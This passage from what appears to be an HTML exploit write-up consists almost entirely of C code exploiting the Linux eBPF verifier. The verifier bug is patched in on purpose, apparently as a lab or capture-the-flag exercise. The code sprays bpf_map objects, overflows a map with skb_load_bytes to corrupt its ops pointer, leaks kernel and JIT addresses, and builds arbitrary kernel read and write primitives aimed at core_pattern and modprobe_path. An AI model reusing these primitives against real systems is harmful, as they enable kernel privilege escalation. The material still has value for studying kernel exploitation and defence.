r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = map_elem BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6), // arg3 = r6 == map_elem // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4, 0xf1 - 1), // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1; // val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } char buf[0x100] = { 0, }; // Overwrite low byte of bpf_map-&gt;ops // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63) memset(buf, &#39;a&#39;, 0xf0); buf[0xf0] = 0xa0 - 8; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); } int corrupted_map_fd; uint64_t bpf_map_addr; void find_corrupted_map_and_leak_bpf_map_addr() { char verifier_log[0x10000]; for (int i = 0; i &lt; sizeof(map_spray_fd) / 4; ++i) { int cur_map_fd = map_spray_fd[i]; if (cur_map_fd == mapfd) { continue; } // uint64_t map_val = 0; // int ret = bpf_map_update(cur_map_fd, 0, &amp;map_val); // printf(&#34;ret: 0x%x, val: 0x%lx\n&#34;, ret, map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd), // arg2(&amp;key) = fp-0x10 &lt;- 0 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) = fp-0x10 &lt;- 0 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd, // fp-0x10) if corrupted BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) = fp-0x10 &lt;- 0 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) = fp-0x18 &lt;- return value of map_update_elem or // map_lookup_elem. BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, fp-0x10, fp-0x18, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } write(socks[1], &#34;Hello&#34;, 5); uint64_t val; bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); if (val != 0) { bpf_map_addr = val - 0x110; corrupted_map_fd = cur_map_fd; continue; } close(cur_map_fd); } } uint64_t aaw64(uint64_t addr, uint64_t val) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0x10), // arg3(to) = addr BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg3 = fp-0x18 == addr // arg4(len) BPF_MOV64_IMM(BPF_REG_ARG4, 8), // skb_load_bytes(skb, 0x10, addr, 8) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr, val}; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); return buf[0]; } uint64_t aar64(uint64_t addr) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr}; write(socks[1], buf, sizeof(buf)); bpf_map_lookup(mapfd, 0, &amp;map_val); close(socks[0]); close(socks[1]); close(progfd); return map_val; } uint64_t bpf_map_addr = 0; int main() { srand(time(NULL)); char verifier_log[0x10000]; make_corrupted_map(); find_corrupted_map_and_leak_bpf_map_addr(); if (corrupted_map_fd == 0) { puts(&#34;[-] Failed to find corrupted bpf_map&#34;); return -1; } printf(&#34;[+] mapfd: %d\n&#34;, mapfd); printf(&#34;[+] corrupted_map_fd: %d\n&#34;, corrupted_map_fd); printf(&#34;[+] bpf_map_addr: 0x%016lx\n&#34;, bpf_map_addr); puts(&#34;[*] Restore corrupted map...&#34;); uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8; aaw64(bpf_map_addr, bpf_map_ops); return 0; }</code></pre></div> <h4 id="leak-addr-of-jit-code-using-oob-read--heap-spray">Leak addr of JIT code using oob read &amp; heap spray</h4> <div class="collapsable-code"> <input id="254613798" type="checkbox" checked /> <label for="254613798"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">leak_jit_addr_using_oob_read.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Patch location: // https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957 // Diff: // 7957c7957,7958 // &lt; __mark_reg32_known(dst_reg, var32_off.value); // --- // &gt; // `scalar_min_max_or` will handler the case // &gt; //__mark_reg32_known(dst_reg, var32_off.value); #include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE) #define BPF_MAP_OPS_LOOKUP_IDX 12 #define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \ (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8) #define BPF_MAP_OPS_UPDATE_ELEM_IDX 13 #define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \ (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8) #define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE) #define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE) #define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd; int map_spray_fd[0x100]; void make_corrupted_map() { uint64_t map_val = 1; puts(&#34;[*] Spray struct bpf_map...&#34;); for (int i = 0; i &lt; sizeof(map_spray_fd) / 4; i++) { map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1); bpf_map_update(map_spray_fd[i], 0, &amp;map_val); } mapfd = map_spray_fd[0x81]; char verifier_log[0x10000]; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = map_elem BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6), // arg3 = r6 == map_elem // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4, 0xf2 - 1), // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1; // val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } char buf[0x100] = { 0, }; // Overwrite low byte of bpf_map-&gt;ops // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63) uint16_t ops_containing_ret_offset = (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp; 0xffff; printf(&#34;ops_containing_ret_offset: 0x%x\n&#34;, ops_containing_ret_offset); *(uint16_t*)(&amp;buf[0xf0]) = ops_containing_ret_offset; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); } int corrupted_map_fd; uint64_t jit_addr; void find_corrupted_map_and_leak_bpf_map_addr() { char verifier_log[0x10000]; for (int i = 0; i &lt; sizeof(map_spray_fd) / 4; ++i) { int cur_map_fd = map_spray_fd[i]; if (cur_map_fd == mapfd) { continue; } // uint64_t map_val = 0; // int ret = bpf_map_update(cur_map_fd, 0, &amp;map_val); // printf(&#34;ret: 0x%x, val: 0x%lx\n&#34;, ret, map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd), // arg2(&amp;key) = fp-0x10 &lt;- 0 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) = fp-0x10 &lt;- 0 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd, // fp-0x10) if corrupted BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) = fp-0x10 &lt;- 0 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) = fp-0x18 &lt;- return value of map_update_elem or // map_lookup_elem. BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, fp-0x10, fp-0x18, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = 